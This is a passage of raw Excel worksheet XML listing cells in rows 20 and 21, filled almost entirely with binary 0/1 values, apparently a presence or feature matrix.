      </c>
      <c r="KZ20">
        <v>0</v>
      </c>
      <c r="LA20">
        <v>1</v>
      </c>
      <c r="LB20">
        <v>0</v>
      </c>
      <c r="LC20">
        <v>0</v>
      </c>
      <c r="LD20">
        <v>0</v>
      </c>
      <c r="LE20">
        <v>0</v>
      </c>
      <c r="LF20">
        <v>1</v>
      </c>
      <c r="LG20">
        <v>0</v>
      </c>
      <c r="LH20">
        <v>1</v>
      </c>
      <c r="LI20">
        <v>1</v>
      </c>
      <c r="LJ20">
        <v>1</v>
      </c>
      <c r="LK20">
        <v>0</v>
      </c>
      <c r="LL20">
        <v>1</v>
      </c>
      <c r="LM20">
        <v>0</v>
      </c>
      <c r="LN20">
        <v>0</v>
      </c>
      <c r="LO20">
        <v>1</v>
      </c>
      <c r="LP20">
        <v>1</v>
      </c>
      <c r="LQ20">
        <v>0</v>
      </c>
      <c r="LR20">
        <v>1</v>
      </c>
      <c r="LS20">
        <v>1</v>
      </c>
      <c r="LT20">
        <v>1</v>
      </c>
      <c r="LU20">
        <v>0</v>
      </c>
      <c r="LV20">
        <v>1</v>
      </c>
      <c r="LW20">
        <v>1</v>
      </c>
      <c r="LX20">
        <v>0</v>
      </c>
      <c r="LY20">
        <v>0</v>
      </c>
      <c r="LZ20">
        <v>1</v>
      </c>
      <c r="MA20">
        <v>0</v>
      </c>
      <c r="MB20">
        <v>0</v>
      </c>
      <c r="MC20">
        <v>1</v>
      </c>
      <c r="MD20">
        <v>1</v>
      </c>
      <c r="ME20">
        <v>0</v>
      </c>
      <c r="MF20">
        <v>0</v>
      </c>
      <c r="MG20">
        <v>1</v>
      </c>
      <c r="MH20">
        <v>0</v>
      </c>
      <c r="MI20">
        <v>1</v>
      </c>
      <c r="MJ20">
        <v>0</v>
      </c>
      <c r="MK20">
        <v>0</v>
      </c>
      <c r="ML20">
        <v>1</v>
      </c>
      <c r="MM20">
        <v>0</v>
      </c>
      <c r="MN20">
        <v>0</v>
      </c>
      <c r="MO20">
        <v>0</v>
      </c>
      <c r="MP20">
        <v>1</v>
      </c>
      <c r="MQ20">
        <v>0</v>
      </c>
      <c r="MR20">
        <v>0</v>
      </c>
      <c r="MS20">
        <v>0</v>
      </c>
      <c r="MT20">
        <v>0</v>
      </c>
      <c r="MU20">
        <v>0</v>
      </c>
      <c r="MV20">
        <v>0</v>
      </c>
      <c r="MW20">
        <v>1</v>
      </c>
      <c r="MX20">
        <v>0</v>
      </c>
      <c r="MY20">
        <v>0</v>
      </c>
      <c r="MZ20">
        <v>0</v>
      </c>
      <c r="NA20">
        <v>0</v>
      </c>
      <c r="NB20">
        <v>0</v>
      </c>
      <c r="NC20">
        <v>0</v>
      </c>
      <c r="ND20">
        <v>0</v>
      </c>
      <c r="NE20">
        <v>1</v>
      </c>
      <c r="NF20">
        <v>0</v>
      </c>
      <c r="NG20">
        <v>1</v>
      </c>
      <c r="NH20">
        <v>0</v>
      </c>
      <c r="NI20">
        <v>0</v>
      </c>
      <c r="NJ20">
        <v>0</v>
      </c>
      <c r="NK20">
        <v>1</v>
      </c>
      <c r="NL20">
        <v>0</v>
      </c>
      <c r="NM20">
        <v>1</v>
      </c>
      <c r="NN20">
        <v>0</v>
      </c>
      <c r="NO20">
        <v>0</v>
      </c>
      <c r="NP20">
        <v>1</v>
      </c>
      <c r="NQ20">
        <v>0</v>
      </c>
      <c r="NR20">
        <v>1</v>
      </c>
      <c r="NS20">
        <v>1</v>
      </c>
      <c r="NT20">
        <v>1</v>
      </c>
      <c r="NU20">
        <v>1</v>
      </c>
      <c r="NV20">
        <v>1</v>
      </c>
      <c r="NW20">
        <v>0</v>
      </c>
      <c r="NX20">
        <v>1</v>
      </c>
      <c r="NY20">
        <v>1</v>
      </c>
      <c r="NZ20">
        <v>1</v>
      </c>
      <c r="OA20">
        <v>0</v>
      </c>
      <c r="OB20">
        <v>0</v>
      </c>
      <c r="OC20">
        <v>1</v>
      </c>
      <c r="OD20">
        <v>0</v>
      </c>
      <c r="OE20">
        <v>1</v>
      </c>
      <c r="OF20">
        <v>1</v>
      </c>
      <c r="OG20">
        <v>1</v>
      </c>
      <c r="OH20">
        <v>0</v>
      </c>
      <c r="OI20">
        <v>0</v>
      </c>
      <c r="OJ20">
        <v>0</v>
      </c>
      <c r="OK20">
        <v>0</v>
      </c>
      <c r="OL20">
        <v>1</v>
      </c>
      <c r="OM20">
        <v>0</v>
      </c>
      <c r="ON20">
        <v>0</v>
      </c>
      <c r="OO20">
        <v>1</v>
      </c>
      <c r="OP20">
        <v>0</v>
      </c>
      <c r="OQ20">
        <v>0</v>
      </c>
      <c r="OR20">
        <v>0</v>
      </c>
      <c r="OS20">
        <v>0</v>
      </c>
      <c r="OT20">
        <v>0</v>
      </c>
      <c r="OU20">
        <v>0</v>
      </c>
      <c r="OV20">
        <v>0</v>
      </c>
      <c r="OW20">
        <v>1</v>
      </c>
      <c r="OX20">
        <v>0</v>
      </c>
      <c r="OY20">
        <v>0</v>
      </c>
      <c r="OZ20">
        <v>0</v>
      </c>
      <c r="PA20">
        <v>0</v>
      </c>
      <c r="PB20">
        <v>0</v>
      </c>
      <c r="PC20">
        <v>1</v>
      </c>
      <c r="PD20">
        <v>0</v>
      </c>
      <c r="PE20">
        <v>0</v>
      </c>
      <c r="PF20">
        <v>1</v>
      </c>
      <c r="PG20">
        <v>1</v>
      </c>
      <c r="PH20">
        <v>0</v>
      </c>
      <c r="PI20">
        <v>0</v>
      </c>
      <c r="PJ20">
        <v>0</v>
      </c>
      <c r="PK20">
        <v>1</v>
      </c>
      <c r="PL20">
        <v>1</v>
      </c>
      <c r="PM20">
        <v>0</v>
      </c>
      <c r="PN20">
        <v>0</v>
      </c>
      <c r="PO20">
        <v>0</v>
      </c>
      <c r="PP20">
        <v>0</v>
      </c>
      <c r="PQ20">
        <v>0</v>
      </c>
      <c r="PR20">
        <v>1</v>
      </c>
      <c r="PS20">
        <v>1</v>
      </c>
      <c r="PT20">
        <v>1</v>
      </c>
      <c r="PU20">
        <v>1</v>
      </c>
      <c r="PV20">
        <v>1</v>
      </c>
      <c r="PW20">
        <v>0</v>
      </c>
      <c r="PX20">
        <v>0</v>
      </c>
      <c r="PY20">
        <v>0</v>
      </c>
      <c r="PZ20">
        <v>0</v>
      </c>
      <c r="QA20">
        <v>0</v>
      </c>
      <c r="QB20">
        <v>0</v>
      </c>
      <c r="QC20">
        <v>0</v>
      </c>
      <c r="QD20">
        <v>1</v>
      </c>
      <c r="QE20">
        <v>0</v>
      </c>
      <c r="QF20">
        <v>1</v>
      </c>
      <c r="QG20">
        <v>1</v>
      </c>
      <c r="QH20">
        <v>0</v>
      </c>
      <c r="QI20">
        <v>0</v>
      </c>
      <c r="QJ20">
        <v>0</v>
      </c>
      <c r="QK20">
        <v>1</v>
      </c>
      <c r="QL20">
        <v>0</v>
      </c>
      <c r="QM20">
        <v>0</v>
      </c>
      <c r="QN20">
        <v>0</v>
      </c>
      <c r="QO20">
        <v>0</v>
      </c>
      <c r="QP20">
        <v>1</v>
      </c>
      <c r="QQ20">
        <v>1</v>
      </c>
      <c r="QR20">
        <v>1</v>
      </c>
      <c r="QS20">
        <v>1</v>
      </c>
      <c r="QT20">
        <v>1</v>
      </c>
      <c r="QU20">
        <v>0</v>
      </c>
      <c r="QV20">
        <v>1</v>
      </c>
      <c r="QW20">
        <v>1</v>
      </c>
      <c r="QX20">
        <v>0</v>
      </c>
      <c r="QY20">
        <v>0</v>
      </c>
      <c r="QZ20">
        <v>0</v>
      </c>
      <c r="RA20">
        <v>0</v>
      </c>
      <c r="RB20">
        <v>0</v>
      </c>
      <c r="RC20">
        <v>1</v>
      </c>
      <c r="RD20">
        <v>0</v>
      </c>
      <c r="RE20">
        <v>0</v>
      </c>
      <c r="RF20">
        <v>0</v>
      </c>
      <c r="RG20">
        <v>0</v>
      </c>
      <c r="RH20">
        <v>0</v>
      </c>
      <c r="RI20">
        <v>1</v>
      </c>
      <c r="RJ20">
        <v>0</v>
      </c>
      <c r="RK20">
        <v>0</v>
      </c>
      <c r="RL20">
        <v>0</v>
      </c>
      <c r="RM20">
        <v>0</v>
      </c>
      <c r="RN20">
        <v>0</v>
      </c>
      <c r="RO20">
        <v>0</v>
      </c>
      <c r="RP20">
        <v>0</v>
      </c>
      <c r="RQ20">
        <v>0</v>
      </c>
      <c r="RR20">
        <v>1</v>
      </c>
      <c r="RS20">
        <v>1</v>
      </c>
      <c r="RT20">
        <v>0</v>
      </c>
      <c r="RU20">
        <v>0</v>
      </c>
      <c r="RV20">
        <v>0</v>
      </c>
      <c r="RW20">
        <v>0</v>
      </c>
      <c r="RX20">
        <v>0</v>
      </c>
      <c r="RY20">
        <v>0</v>
      </c>
      <c r="RZ20">
        <v>0</v>
      </c>
      <c r="SA20">
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A21" s="6" t="s">
        <v>2659</v>
      </c>
      <c r="B21">
        <v>21</v>
      </c>
      <c r="C21">
        <v>0</v>
      </c>
      <c r="D21">
        <v>0</v>
      </c>
      <c r="E21">
        <v>0</v>
      </c>
      <c r="F21">
        <v>0</v>
      </c>
      <c r="G21">
        <v>0</v>
      </c>
      <c r="H21">
        <v>0</v>
      </c>
      <c r="I21">
        <v>0</v>
      </c>
      <c r="J21">
        <v>0</v>
      </c>
      <c r="K21">
        <v>0</v>
      </c>
      <c r="L21">
        <v>0</v>
      </c>
      <c r="M21">
        <v>1</v>
      </c>
      <c r="N21">
        <v>0</v>
      </c>
      <c r="O21">
        <v>0</v>
      </c>
      <c r="P21">
        <v>1</v>
      </c>
      <c r="Q21">
        <v>0</v>
      </c>
      <c r="R21">
        <v>0</v>
      </c>
      <c r="S21">
        <v>0</v>
      </c>
      <c r="T21">
        <v>0</v>
      </c>
      <c r="U21">
        <v>0</v>
      </c>
      <c r="V21">
        <v>0</v>
      </c>
      <c r="W21">
        <v>0</v>
      </c>
      <c r="X21">
        <v>0</v>
      </c>
      <c r="Y21">
        <v>0</v>
      </c>
      <c r="Z21">
        <v>0</v>
      </c>
      <c r="AA21">
        <v>0</v>
      </c>
      <c r="AB21">
        <v>0</v>
      </c>
      <c r="AC21">
        <v>0</v>
      </c>
      <c r="AD21">
        <v>0</v>
      </c>
      <c r="AE21">
        <v>0</v>
      </c>
      <c r="AF21">
        <v>0</v>
      </c>
      <c r="AG21">
        <v>0</v>
      </c>
      <c r="AH21">
        <v>0</v>
      </c>
      <c r="AI21">
        <v>0</v>
      </c>
      <c r="AJ21">
        <v>0</v>
      </c>
      <c r="AK21">
        <v>0</v>
      </c>
      <c r="AL21">
        <v>0</v>
      </c>
      <c r="AM21">
        <v>0</v>
      </c>
      <c r="AN21">
        <v>0</v>
      </c>
      <c r="AO21">
        <v>0</v>
      </c>
      <c r="AP21">
        <v>0</v>
      </c>
      <c r="AQ21">
        <v>0</v>
      </c>
      <c r="AR21">
        <v>0</v>
      </c>
      <c r="AS21">
        <v>0</v>
      </c>
      <c r="AT21">
        <v>0</v>
      </c>
      <c r="AU21">
        <v>0</v>
      </c>
      <c r="AV21">
        <v>0</v>
      </c>
      <c r="AW21">
        <v>0</v>
      </c>
      <c r="AX21">
        <v>0</v>
      </c>
      <c r="AY21">
        <v>0</v>
      </c>
      <c r="AZ21">
        <v>0</v>
      </c>
      <c r="BA21">
        <v>0</v>
      </c>
      <c r="BB21">
        <v>0</v>
      </c>
      <c r="BC21">
        <v>0</v>
      </c>
      <c r="BD21">
        <v>0</v>
      </c>
      <c r="BE21">
        <v>0</v>
      </c>
      <c r="BF21">
        <v>0</v>
      </c>
      <c r="BG21">
        <v>0</v>
      </c>
      <c r="BH21">
        <v>0</v>
      </c>
      <c r="BI21">
        <v>1</v>
      </c>
      <c r="BJ21">
        <v>0</v>
      </c>
      <c r="BK21">
        <v>0</v>
      </c>
      <c r="BL21">
        <v>0</v>
      </c>
      <c r="BM21">
        <v>0</v>
      </c>
      <c r="BN21">
        <v>0</v>
      </c>
      <c r="BO21">
        <v>0</v>
      </c>
      <c r="BP21">
        <v>0</v>
      </c>
      <c r="BQ21">
        <v>1</v>
      </c>
      <c r="BR21">
        <v>0</v>
      </c>
      <c r="BS21">
        <v>0</v>
      </c>
      <c r="BT21">
        <v>0</v>
      </c>
      <c r="BU21">
        <v>0</v>
      </c>
      <c r="BV21">
        <v>0</v>
      </c>
      <c r="BW21">
        <v>0</v>
      </c>
      <c r="BX21">
        <v>0</v>
      </c>
      <c r="BY21">
        <v>0</v>
      </c>
      <c r="BZ21">
        <v>0</v>
      </c>
      <c r="CA21">
        <v>0</v>
      </c>
      <c r="CB21">
        <v>0</v>
      </c>
      <c r="CC21">
        <v>0</v>
      </c>
      <c r="CD21">
        <v>0</v>
      </c>
      <c r="CE21">
        <v>0</v>
      </c>
      <c r="CF21">
        <v>0</v>
      </c>
      <c r="CG21">
        <v>0</v>
      </c>
      <c r="CH21">
        <v>0</v>
      </c>
      <c r="CI21">
        <v>0</v>
      </c>
      <c r="CJ21">
        <v>0</v>
      </c>
      <c r="CK21">
        <v>0</v>
      </c>
      <c r="CL21">
        <v>0</v>
      </c>
      <c r="CM21">
        <v>0</v>
      </c>
      <c r="CN21">
        <v>0</v>
      </c>
      <c r="CO21">
        <v>0</v>
      </c>
      <c r="CP21">
        <v>0</v>
      </c>
      <c r="CQ21">
        <v>0</v>
      </c>
      <c r="CR21">
        <v>0</v>
      </c>
      <c r="CS21">
        <v>0</v>
      </c>
      <c r="CT21">
        <v>0</v>
      </c>
      <c r="CU21">
        <v>0</v>
      </c>
      <c r="CV21">
        <v>0</v>
      </c>
      <c r="CW21">
        <v>0</v>
      </c>
      <c r="CX21">
        <v>0</v>
      </c>
      <c r="CY21">
        <v>0</v>
      </c>
      <c r="CZ21">
        <v>0</v>
      </c>
      <c r="DA21">
        <v>0</v>
      </c>
      <c r="DB21">
        <v>0</v>
      </c>
      <c r="DC21">
        <v>0</v>
      </c>
      <c r="DD21">
        <v>1</v>
      </c>
      <c r="DE21">
        <v>0</v>
      </c>
      <c r="DF21">
        <v>0</v>
      </c>
      <c r="DG21">
        <v>0</v>
      </c>
      <c r="DH21">
        <v>0</v>
      </c>
      <c r="DI21">
        <v>0</v>
      </c>
      <c r="DJ21">
        <v>0</v>
      </c>
      <c r="DK21">
        <v>0</v>
      </c>
      <c r="DL21">
        <v>0</v>
      </c>
      <c r="DM21">
        <v>0</v>
      </c>
      <c r="DN21">
        <v>0</v>
      </c>
      <c r="DO21">
        <v>0</v>
      </c>
      <c r="DP21">
        <v>0</v>
      </c>
      <c r="DQ21">
        <v>0</v>
      </c>
      <c r="DR21">
        <v>0</v>
      </c>
      <c r="DS21">
        <v>0</v>
      </c>
      <c r="DT21">
        <v>0</v>
      </c>
      <c r="DU21">
        <v>0</v>
      </c>
      <c r="DV21">
        <v>0</v>
      </c>
      <c r="DW21">
        <v>0</v>
      </c>
      <c r="DX21">
        <v>0</v>
      </c>
      <c r="DY21">
        <v>0</v>
      </c>
      <c r="DZ21">
        <v>0</v>
      </c>
      <c r="EA21">
        <v>0</v>
      </c>
      <c r="EB21">
        <v>0</v>
      </c>
      <c r="EC21">
        <v>0</v>
      </c>
      <c r="ED21">
        <v>0</v>
      </c>
      <c r="EE21">
        <v>0</v>
      </c>
      <c r="EF21">
        <v>0</v>
      </c>
      <c r="EG21">
        <v>0</v>
      </c>
      <c r="EH21">
        <v>0</v>
      </c>
      <c r="EI21">
        <v>0</v>
      </c>
      <c r="EJ21">
        <v>0</v>
      </c>
      <c r="EK21">
        <v>0</v>
      </c>
      <c r="EL21">
        <v>0</v>
      </c>
      <c r="EM21">
        <v>0</v>
      </c>
      <c r="EN21">
        <v>0</v>
      </c>
      <c r="EO21">
        <v>0</v>
      </c>
      <c r="EP21">
        <v>0</v>
      </c>
      <c r="EQ21">
        <v>0</v>
      </c>
      <c r="ER21">
        <v>0</v>
      </c>
      <c r="ES21">
        <v>0</v>
      </c>
      <c r="ET21">
        <v>0</v>
      </c>
      <c r="EU21">
        <v>0</v>
      </c>
      <c r="EV21">
        <v>0</v>
      </c>
      <c r="EW21">
        <v>0</v>
      </c>
      <c r="EX21">
        <v>0</v>
      </c>
      <c r="EY21">
        <v>1</v>
      </c>
      <c r="EZ21">
        <v>0</v>
      </c>
      <c r="FA21">
        <v>0</v>
      </c>
      <c r="FB21">
        <v>0</v>
      </c>
      <c r="FC21">
        <v>0</v>
      </c>
      <c r="FD21">
        <v>0</v>
      </c>
      <c r="FE21">
        <v>0</v>
      </c>
      <c r="FF21">
        <v>0</v>
      </c>
      <c r="FG21">
        <v>0</v>
      </c>
      <c r="FH21">
        <v>0</v>
      </c>
      <c r="FI21">
        <v>0</v>
      </c>
      <c r="FJ21">
        <v>0</v>
      </c>
      <c r="FK21">
        <v>0</v>
      </c>
      <c r="FL21">
        <v>0</v>
      </c>
      <c r="FM21">
        <v>0</v>
      </c>
      <c r="FN21">
        <v>0</v>
      </c>
      <c r="FO21">
        <v>0</v>
      </c>
      <c r="FP21">
        <v>0</v>
      </c>
      <c r="FQ21">
        <v>0</v>
      </c>
      <c r="FR21">
        <v>0</v>
      </c>
      <c r="FS21">
        <v>0</v>
      </c>
      <c r="FT21">
        <v>0</v>
      </c>
      <c r="FU21">
        <v>0</v>
      </c>
      <c r="FV21">
        <v>0</v>
      </c>
      <c r="FW21">
        <v>1</v>
      </c>
      <c r="FX21">
        <v>0</v>
      </c>
      <c r="FY21">
        <v>0</v>
      </c>
      <c r="FZ21">
        <v>0</v>
      </c>
      <c r="GA21">
        <v>0</v>
      </c>
      <c r="GB21">
        <v>0</v>
      </c>
      <c r="GC21">
        <v>0</v>
      </c>
      <c r="GD21">
        <v>0</v>
      </c>
      <c r="GE21">
        <v>0</v>
      </c>
      <c r="GF21">
        <v>1</v>
      </c>
      <c r="GG21">
        <v>0</v>
      </c>
      <c r="GH21">
        <v>0</v>
      </c>
      <c r="GI21">
        <v>0</v>
      </c>
      <c r="GJ21">
        <v>0</v>
      </c>
      <c r="GK21">
        <v>0</v>
      </c>
      <c r="GL21">
        <v>0</v>
      </c>
      <c r="GM21">
        <v>0</v>
      </c>
      <c r="GN21">
        <v>0</v>
      </c>
      <c r="GO21">
        <v>0</v>
      </c>
      <c r="GP21">
        <v>0</v>
      </c>
      <c r="GQ21">
        <v>0</v>
      </c>
      <c r="GR21">
        <v>0</v>
      </c>
      <c r="GS21">
        <v>0</v>
      </c>
      <c r="GT21">
        <v>0</v>
      </c>
      <c r="GU21">
        <v>1</v>
      </c>
      <c r="GV21">
        <v>0</v>
      </c>
      <c r="GW21">
        <v>0</v>
      </c>
      <c r="GX21">
        <v>0</v>
      </c>
      <c r="GY21">
        <v>0</v>
      </c>
      <c r="GZ21">
        <v>0</v>
      </c>
      <c r="HA21">
        <v>0</v>
      </c>
      <c r="HB21">
        <v>0</v>
      </c>
      <c r="HC21">
        <v>0</v>
      </c>
      <c r="HD21">
        <v>0</v>
      </c>
      <c r="HE21">
        <v>0</v>
      </c>
      <c r="HF21">
        <v>0</v>
      </c>
      <c r="HG21">
        <v>0</v>
      </c>
      <c r="HH21">
        <v>0</v>
      </c>
      <c r="HI21">
        <v>0</v>
      </c>
      <c r="HJ21">
        <v>0</v>
      </c>
      <c r="HK21">
        <v>0</v>
      </c>
      <c r="HL21">
        <v>0</v>
      </c>
      <c r="HM21">
        <v>0</v>
      </c>
      <c r="HN21">
        <v>0</v>
      </c>
      <c r="HO21">
        <v>0</v>
      </c>
      <c r="HP21">
        <v>0</v>
      </c>
      <c r="HQ21">
        <v>0</v>
      </c>
      <c r="HR21">
        <v>0</v>
      </c>
      <c r="HS21">
        <v>0</v>
      </c>
      <c r="HT21">
        <v>0</v>
      </c>
      <c r="HU21">
        <v>0</v>
      </c>
      <c r="HV21">
        <v>1</v>
      </c>
      <c r="HW21">
        <v>0</v>
      </c>
      <c r="HX21">
        <v>0</v>
      </c>
      <c r="HY21">
        <v>0</v>
      </c>
      <c r="HZ21">
        <v>0</v>
      </c>
      <c r="IA21">
        <v>0</v>
      </c>
      <c r="IB21">
        <v>0</v>
      </c>
      <c r="IC21">
        <v>1</v>
      </c>
      <c r="ID21">
        <v>0</v>
      </c>
      <c r="IE21">
        <v>0</v>
      </c>
      <c r="IF21">
        <v>0</v>
      </c>
      <c r="IG21">
        <v>0</v>
      </c>
      <c r="IH21">
        <v>0</v>
      </c>
      <c r="II21">
        <v>0</v>
      </c>
      <c r="IJ21">
        <v>0</v>
      </c>
      <c r="IK21">
        <v>0</v>
      </c>
      <c r="IL21">
        <v>0</v>
      </c>
      <c r="IM21">
        <v>0</v>
      </c>
      <c r="IN21">
        <v>0</v>
      </c>
      <c r="IO21">
        <v>0</v>
      </c>
      <c r="IP21">
        <v>0</v>
      </c>
      <c r="IQ21">
        <v>0</v>
      </c>
      <c r="IR21">
        <v>0</v>
      </c>
      <c r="IS21">
        <v>0</v>
      </c>
      <c r="IT21">
        <v>0</v>
      </c>
      <c r="IU21">
        <v>1</v>
      </c>
      <c r="IV21">
        <v>0</v>
      </c>
      <c r="IW21">
        <v>0</v>
      </c>
      <c r="IX21">
        <v>0</v>
      </c>
      <c r="IY21">
        <v>0</v>
      </c>
      <c r="IZ21">
        <v>0</v>
      </c>
      <c r="JA21">
        <v>0</v>
      </c>
      <c r="JB21">
        <v>0</v>
      </c>
      <c r="JC21">
        <v>0</v>
      </c>
      <c r="JD21">
        <v>1</v>
      </c>
      <c r="JE21">
        <v>0</v>
      </c>
      <c r="JF21">
        <v>0</v>
      </c>
      <c r="JG21">
        <v>0</v>
      </c>
      <c r="JH21">
        <v>0</v>
      </c>
      <c r="JI21">
        <v>0</v>
      </c>
      <c r="JJ21">
        <v>0</v>
      </c>
      <c r="JK21">
        <v>0</v>
      </c>
      <c r="JL21">
        <v>0</v>
      </c>
      <c r="JM21">
        <v>0</v>
      </c>
      <c r="JN21">
        <v>0</v>
      </c>
      <c r="JO21">
        <v>0</v>
      </c>
      <c r="JP21">
        <v>0</v>
      </c>
      <c r="JQ21">
        <v>0</v>
      </c>
      <c r="JR21">
        <v>0</v>
      </c>
      <c r="JS21">
        <v>0</v>
      </c>
      <c r="JT21">
        <v>0</v>
      </c>
      <c r="JU21">
        <v>0</v>
      </c>
      <c r="JV21">
        <v>0</v>
      </c>
      <c r="JW21">
        <v>0</v>
      </c>
      <c r="JX21">
        <v>0</v>
      </c>
      <c r="JY21">
        <v>0</v>
      </c>
      <c r="JZ21">
        <v>0</v>
      </c>
      <c r="KA21">
        <v>1</v>
      </c>
      <c r="KB21">
        <v>0</v>
      </c>
      <c r="KC21">
        <v>0</v>
      </c>
      <c r="KD21">
        <v>0</v>
      </c>
      <c r="KE21">
        <v>0</v>
      </c>
      <c r="KF21">
        <v>0</v>
      </c>
      <c r="KG21">
        <v>0</v>
      </c>
      <c r="KH21">
        <v>0</v>
      </c>
      <c r="KI21">
        <v>0</v>
      </c>
      <c r="KJ21">
        <v>0</v>
      </c>
      <c r="KK21">
        <v>0</v>
      </c>
      <c r="KL21">
        <v>0</v>
      </c>
      <c r="KM21">
        <v>0</v>
      </c>
      <c r="KN21">
        <v>0</v>
      </c>
      <c r="KO21">
        <v>0</v>
      </c>
      <c r="KP21">
        <v>0</v>
      </c>
      <c r="KQ21">
        <v>0</v>
      </c>
      <c r="KR21">
        <v>0</v>
      </c>
      <c r="KS21">
        <v>0</v>
      </c>
      <c r="KT21">
        <v>0</v>
      </c>
      <c r="KU21">
        <v>1</v>
      </c>
      <c r="KV21">
        <v>0</v>
      </c>
      <c r="KW21">
        <v>0</v>
      </c>
      <c r="KX21">
        <v>0</v>
      </c>
      <c r="KY21">
        <v>0</v>
      </c>
      <c r="KZ21">
        <v>1</v>
      </c>
      <c r="LA21">
        <v>0</v>
      </c>
      <c r="LB21">
        <v>0</v>
      </c>
      <c r="LC21">
        <v>0</v>
      </c>
      <c r="LD21">
        <v>0</v>
      </c>
      <c r="LE21">
        <v>0</v>
      </c>
      <c r="LF21">
        <v>0</v>
      </c>
      <c r="LG21">
        <v>0</v>
      </c>
      <c r="LH21">
        <v>0</v>
      </c>
      <c r="LI21">
        <v>0</v>
      </c>
      <c r="LJ21">
        <v>0</v>
      </c>
      <c r="LK21">
        <v>0</v>
      </c>
      <c r="LL21">
        <v>0</v>
      </c>
      <c r="LM21">
        <v>0</v>
      </c>
      <c r="LN21">
        <v>0</v>
      </c>
      <c r="LO21">
        <v>0</v>
      </c>
      <c r="LP21">
        <v>0</v>
      </c>
      <c r="LQ21">
        <v>0</v>
      </c>
      <c r="LR21">
        <v>0</v>
      </c>
      <c r="LS21">
        <v>0</v>
      </c>
      <c r="LT21">
        <v>0</v>
      </c>
      <c r="LU21">
        <v>0</v>
      </c>
      <c r="LV21">
        <v>0</v>
      </c>
      <c r="LW21">
        <v>0</v>
      </c>
      <c r="LX21">
        <v>0</v>
      </c>
      <c r="LY21">
        <v>0</v>
      </c>
      <c r="LZ21">
        <v>0</v>
      </c>
      <c r="MA21">
        <v>0</v>
      </c>
      <c r="MB21">
        <v>0</v>
      </c>
      <c r="MC21">
        <v>0</v>
      </c>
      <c r="MD21">
        <v>0</v>
      </c>
      <c r="ME21">
        <v>0</v>
      </c>
      <c r="MF21">
        <v>0</v>
      </c>
      <c r="MG21">
        <v>0</v>
      </c>
      <c r="MH21">
        <v>0</v>
      </c>
      <c r="MI21">
        <v>1</v>
      </c>
      <c r="MJ21">
        <v>0</v>
      </c>
      <c r="MK21">
        <v>0</v>
      </c>
      <c r="ML21">
        <v>0</v>
      </c>
      <c r="MM21">
        <v>0</v>
      </c>
      <c r="MN21">
        <v>0</v>
      </c>
      <c r="MO21">
        <v>0</v>
      </c>
      <c r="MP21">
        <v>0</v>
      </c>
      <c r="MQ21">
        <v>0</v>
      </c>
      <c r="MR21">
        <v>0</v>
      </c>
      <c r="MS21">
        <v>0</v>
      </c>
      <c r="MT21">
        <v>0</v>
      </c>
      <c r="MU21">
        <v>0</v>
      </c>
      <c r="MV21">
        <v>0</v>
      </c>
      <c r="MW21">
        <v>0</v>
      </c>
      <c r="MX21">
        <v>0</v>
      </c>
      <c r="MY21">
        <v>0</v>
      </c>
      <c r="MZ21">
        <v>0</v>
      </c>
      <c r="NA21">
        <v>0</v>
      </c>
      <c r="NB21">
        <v>0</v>
      </c>
      <c r="NC21">
        <v>0</v>
      </c>
      <c r="ND21">
        <v>0</v>
      </c>
      <c r="NE21">
        <v>0</v>
      </c>
      <c r="NF21">
        <v>0</v>
      </c>
      <c r="NG21">
        <v>0</v>
      </c>
      <c r="NH21">
        <v>1</v>
      </c>
      <c r="NI21">
        <v>0</v>
      </c>
      <c r="NJ21">
        <v>0</v>
      </c>
      <c r="NK21">
        <v>0</v>
      </c>
      <c r="NL21">
        <v>0</v>
      </c>
      <c r="NM21">
        <v>0</v>
      </c>
      <c r="NN21">
        <v>0</v>
      </c>
      <c r="NO21">
        <v>0</v>
      </c>
      <c r="NP21">
        <v>0</v>
      </c>
      <c r="NQ21">
        <v>0</v>
      </c>
      <c r="NR21">
        <v>0</v>
      </c>
      <c r="NS21">
        <v>0</v>
      </c>
      <c r="NT21">
        <v>0</v>
      </c>
      <c r="NU21">
        <v>0</v>
      </c>
      <c r="NV21">
        <v>0</v>
      </c>
      <c r="NW21">
        <v>0</v>
      </c>
      <c r="NX21">
        <v>0</v>
      </c>
      <c r="NY21">
        <v>0</v>
      </c>
      <c r="NZ21">
        <v>0</v>
      </c>
      <c r="OA21">
        <v>0</v>
      </c>
      <c r="OB21">
        <v>0</v>
      </c>
      <c r="OC21">
        <v>0</v>
      </c>
      <c r="OD21">
        <v>0</v>
      </c>
      <c r="OE21">
        <v>0</v>
      </c>
      <c r="OF21">
        <v>0</v>
      </c>
      <c r="OG21">
        <v>0</v>
      </c>
      <c r="OH21">
        <v>0</v>
      </c>
      <c r="OI21">
        <v>0</v>
      </c>
      <c r="OJ21">
        <v>0</v>
      </c>
      <c r="OK21">
        <v>0</v>
      </c>
      <c r="OL21">
        <v>0</v>
      </c>
      <c r="OM21">
        <v>0</v>
      </c>
      <c r="ON21">
        <v>0</v>
      </c>
      <c r="OO21">
        <v>0</v>
      </c>
      <c r="OP21">
        <v>0</v>
      </c>
      <c r="OQ21">
        <v>0</v>
      </c>
      <c r="OR21">
        <v>0</v>
      </c>
      <c r="OS21">
        <v>0</v>
      </c>
      <c r="OT21">
        <v>0</v>
      </c>
      <c r="OU21">
        <v>0</v>
      </c>
      <c r="OV21">
        <v>0</v>
      </c>
      <c r="OW21">
        <v>0</v>
      </c>
      <c r="OX21">
        <v>0</v>
      </c>
      <c r="OY21">
        <v>0</v>
      </c>
      <c r="OZ21">
        <v>0</v>
      </c>
      <c r="PA21">
        <v>0</v>
      </c>
      <c r="PB21">
        <v>0</v>
      </c>
      <c r="PC21">
        <v>0</v>
      </c>
      <c r="PD21">
        <v>0</v>
      </c>
      <c r="PE21">
        <v>0</v>
      </c>
      <c r="PF21">
        <v>0</v>
      </c>
      <c r="PG21">
        <v>1</v>
      </c>
      <c r="PH21">
        <v>0</v>
      </c>
      <c r="PI21">
        <v>0</v>
      </c>
      <c r="PJ21">
        <v>0</v>
      </c>
      <c r="PK21">
        <v>0</v>
      </c>
      <c r="PL21">
        <v>0</v>
      </c>
      <c r="PM21">
        <v>0</v>
      </c>
      <c r="PN21">
        <v>0</v>
      </c>
      <c r="PO21">
        <v>0</v>
      </c>
      <c r="PP21">
        <v>0</v>
      </c>
      <c r="PQ21">
        <v>0</v>
      </c>
      <c r="PR21">
        <v>0</v>
      </c>
      <c r="PS21">
        <v>0</v>
      </c>
      <c r="PT21">
        <v>0</v>
      </c>
      <c r="PU21">
        <v>0</v>
      </c>
